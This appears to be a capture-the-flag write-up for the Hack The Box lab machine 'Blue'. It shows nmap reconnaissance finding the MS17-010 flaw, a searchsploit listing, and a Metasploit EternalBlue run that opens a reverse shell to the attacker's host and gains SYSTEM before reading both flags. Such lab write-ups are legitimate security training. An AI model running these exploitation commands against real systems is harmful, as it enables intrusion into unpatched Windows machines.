Blue
Ports scan
root@kali:~/HTB/Machines/Blue# nmap -A -T4 -v 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-19 08:59 EST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 08:59 Completed NSE at 08:59, 0.00s elapsed Initiating NSE at 08:59 Completed NSE at 08:59, 0.00s elapsed Initiating NSE at 08:59 Completed NSE at 08:59, 0.00s elapsed Initiating Ping Scan at 08:59 Scanning 10.10.10.40 [4 ports] Completed Ping Scan at 08:59, 0.10s elapsed (1 total hosts) Initiating SYN Stealth Scan at 08:59 Scanning blue.htb (10.10.10.40) [1000 ports] Discovered open port 445/tcp on 10.10.10.40 Discovered open port 139/tcp on 10.10.10.40 Discovered open port 135/tcp on 10.10.10.40 Discovered open port 49154/tcp on 10.10.10.40 Discovered open port 49155/tcp on 10.10.10.40 Discovered open port 49157/tcp on 10.10.10.40 Discovered open port 49153/tcp on 10.10.10.40 Discovered open port 49156/tcp on 10.10.10.40 Discovered open port 49152/tcp on 10.10.10.40 Completed SYN Stealth Scan at 08:59, 1.98s elapsed (1000 total ports) Initiating Service scan at 08:59 Scanning 9 services on blue.htb (10.10.10.40) Service scan Timing: About 44.44% done; ETC: 09:01 (0:01:08 remaining) Completed Service scan at 09:00, 59.33s elapsed (9 services on 1 host) Initiating OS detection (try #1) against blue.htb (10.10.10.40) adjust_timeouts2: packet supposedly had rtt of -209048 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -209048 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -208931 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -208931 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -208952 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -208952 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -209091 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -209091 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -208956 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -208956 microseconds. Ignoring time. Retrying OS detection (try #2) against blue.htb (10.10.10.40) adjust_timeouts2: packet supposedly had rtt of -208796 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -208796 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -1110518 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -1110518 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -1160155 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -1160155 microseconds. Ignoring time. Retrying OS detection (try #3) against blue.htb (10.10.10.40) Retrying OS detection (try #4) against blue.htb (10.10.10.40) adjust_timeouts2: packet supposedly had rtt of -208738 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -208738 microseconds. Ignoring time. Retrying OS detection (try #5) against blue.htb (10.10.10.40) Initiating Traceroute at 09:01 Completed Traceroute at 09:01, 0.05s elapsed Initiating Parallel DNS resolution of 2 hosts. at 09:01 Completed Parallel DNS resolution of 2 hosts. at 09:01, 0.20s elapsed NSE: Script scanning 10.10.10.40. Initiating NSE at 09:01 Completed NSE at 09:01, 11.22s elapsed Initiating NSE at 09:01 Completed NSE at 09:01, 0.00s elapsed Initiating NSE at 09:01 Completed NSE at 09:01, 0.00s elapsed Nmap scan report for blue.htb (10.10.10.40) Host is up (0.043s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=11/19%OT=135%CT=1%CU=38945%PV=Y%DS=2%DC=T%G=Y%TM=5DD3F OS:5AF%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%CI=I%TS=7)SEQ(SP=103% OS:GCD=1%ISR=10C%TS=7)SEQ(SP=103%GCD=1%ISR=10C%CI=I%II=I%TS=7)OPS(O1=M54DNW OS:8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M5 OS:4DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y% OS:T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=) OS:T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A= OS:O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF= OS:Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=% OS:RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%I OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=80%C OS:D=Z)
Uptime guess: 0.008 days (since Tue Nov 19 08:49:50 2019) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: Busy server or unknown class Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 1s, deviation: 2s, median: 0s | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2019-11-19T14:01:12+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-11-19T14:01:10 |_ start_date: 2019-11-19T13:50:18
TRACEROUTE (using port 53/tcp) HOP RTT ADDRESS 1 42.90 ms 10.10.14.1 2 43.03 ms blue.htb (10.10.10.40)
NSE: Script Post-scanning. Initiating NSE at 09:01 Completed NSE at 09:01, 0.00s elapsed Initiating NSE at 09:01 Completed NSE at 09:01, 0.00s elapsed Initiating NSE at 09:01 Completed NSE at 09:01, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 87.46 seconds Raw packets sent: 1253 (65.276KB) | Rcvd: 5213 (213.102KB)
As expected, the machine is vulnerable at EternalBlue.
root@kali:~/HTB/Machines/Blue# nmap --script vuln 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-19 11:15 EST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for blue.htb (10.10.10.40) Host is up (0.046s latency). Not shown: 991 closed ports PORT STATE SERVICE 135/tcp open msrpc |_clamav-exec: ERROR: Script execution failed (use -d to debug) 139/tcp open netbios-ssn |_clamav-exec: ERROR: Script execution failed (use -d to debug) 445/tcp open microsoft-ds |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49152/tcp open unknown |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49153/tcp open unknown |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49154/tcp open unknown |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49155/tcp open unknown |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49156/tcp open unknown |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49157/tcp open unknown |_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 136.86 seconds
Search exploits
root@kali:~/HTB/Machines/Blue# searchsploit ms17-010
----------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | exploits/windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Executio | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-01 | exploits/windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17 | exploits/windows_x86-64/remote/41987.py
----------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Metasploit
root@kali:~/HTB/Machines/Blue# msfconsole msf5 > search ms17-010
Matching Modules ================
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection 2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization 3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40 RHOSTS => 10.10.10.40 msf5 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [+] 10.10.10.40:445 - The target is vulnerable.
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.34:4444 [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.10.40:445 - Connecting to target for exploitation. [+] 10.10.10.40:445 - Connection established for exploitation. [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes) [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet [*] 10.10.10.40:445 - Starting non-paged pool grooming [+] 10.10.10.40:445 - Sending SMBv2 buffers [+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.10.40:445 - Sending final SMBv2 buffers. [*] 10.10.10.40:445 - Sending last fragment of exploit packet! [*] 10.10.10.40:445 - Receiving response from exploit packet [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.10.10.40:445 - Sending egg to corrupted connection. [*] 10.10.10.40:445 - Triggering free of corrupted buffer. [*] Command shell session 1 opened (10.10.14.34:4444 -> 10.10.10.40:49158) at 2019-11-19 11:29:20 -0500 [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>whoami whoami nt authority\system
User Flag
C:\Windows\System32>cd c:\Users cd c:\Users
c:\Users>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911
Directory of c:\Users
21/07/2017 06:56 <DIR> . 21/07/2017 06:56 <DIR> .. 21/07/2017 06:56 <DIR> Administrator 14/07/2017 13:45 <DIR> haris 12/04/2011 07:51 <DIR> Public 0 File(s) 0 bytes 5 Dir(s) 15,471,329,280 bytes free
c:\Users>type haris\Desktop\user.txt type haris\Desktop\user.txt <USER_FLAG>
Root flag
c:\Users>type Administrator\Desktop\root.txt type Administrator\Desktop\root.txt <ROOT FLAG>
References
- Fuzzbunch + Empire on kali - exploiting Win7 x86 target
- https://github.com/misterch0c/shadowbroker
- File:41897-spanish-how-to-exploit-eternalblue-and-doublepulsar-on-windows-72008.pdf
Daniel Simao 18:03, 21 November 2019 (EST)
